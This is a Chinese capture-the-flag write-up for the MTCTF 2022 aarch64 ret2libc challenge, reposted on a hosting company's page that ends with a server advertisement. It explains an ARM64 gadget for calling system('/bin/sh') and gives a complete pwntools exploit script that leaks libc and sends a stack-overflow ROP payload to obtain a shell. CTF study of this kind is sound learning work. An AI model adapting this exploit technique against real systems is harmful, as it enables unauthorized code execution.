aarch64pwn题学习--美团MTCTF2022ret2libc-创新互联
这题没开pie,就是一个简单的栈溢出,题目都标得明明白白。
然后是栈溢出的利用,利用思路就是栈溢出后通过gadget得到shell,因为这里是arm64的架构,找不到ogg,但我们找到了这么一个gadget:
0x0000000000063e5c : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
这一行指令的意思是ldr x0, [sp, #0x18];把sp+0x18里面的内容给x0,然后x0存储的是函数的第一个参数,我们是想来执行system(‘/bin/sh’),所以把x0里面存/bin/sh,然后是ldp x29, x30, [sp];把sp所指向的内容给x29,sp+8所指向的内容给x30,主要X30寄存器用于保存返回地址,当执行RET指令时,会将X30的值赋值给PC寄存器。所以往sp+8里面写入system函数的地址。然后就得到shell了。
参考wp:
from pwn import *
context(arch='aarch64', os='linux', log_level='debug')
file_name = './pwn'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 0
if debug:
r = remote()
else:
r = process(["qemu-aarch64","-L","/usr/aarch64-linux-gnu/","-g","4444","./pwn"])
# r = process(["qemu-aarch64","-L","/usr/aarch64-linux-gnu/","./pwn"])
elf = ELF(file_name)
libc = ELF('/usr/aarch64-linux-gnu/lib/libc-2.31.so')
def dbg():
gdb.attach(r)
pause()
puts_got = elf.got['puts']
read_got = elf.got['read']
# dbg()
r.sendafter('>\n', '1')
r.sendafter('sensible>>\n', p64(puts_got))
# r.recvuntil('\n')
# puts_addr = u64(r.recv(3).ljust(8, b'\x00'))
puts_addr=libc.sym['puts']
libc_base = u64(r.recv(3).ljust(8,b'\x00')) + 0x4000000000 - libc.sym['puts']
li('puts_addr = ' + hex(puts_addr))
# li('puts_addr = ' + hex(puts_addr))
# libc_base = puts_addr - libc.sym['puts']
# li('libc_base = ' + hex(libc_base))
li('libc_base = ' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
li('system_addr = ' + hex(system_addr))
bin_sh = libc_base +libc.search(b'/bin/sh').__next__()
li('bin_sh = ' + hex(bin_sh))
gadgets = 0x0000000000063e5c + libc_base
#0x0000000000063e5c : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
li('gadgets='+hex(gadgets))
p1 = b'a' * (128 + 8)
p1 += p64(gadgets)
p1 += p64(0) * 3
p1 += p64(system_addr)
p1 += p64(0)
p1 += p64(bin_sh)
r.sendlineafter('>', '2')
# dbg()
r.sendlineafter('sensible>>', p1)
r.interactive()
参考链接:
https://blog.csdn.net/zzq487782568/article/details/126945912
https://tokameine.top/2022/09/20/2022-mt-ctf/#ret2libc_aarch64
你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧
当前名称:aarch64pwn题学习--美团MTCTF2022ret2libc-创新互联
文章路径:http://myzitong.com/article/djoedh.html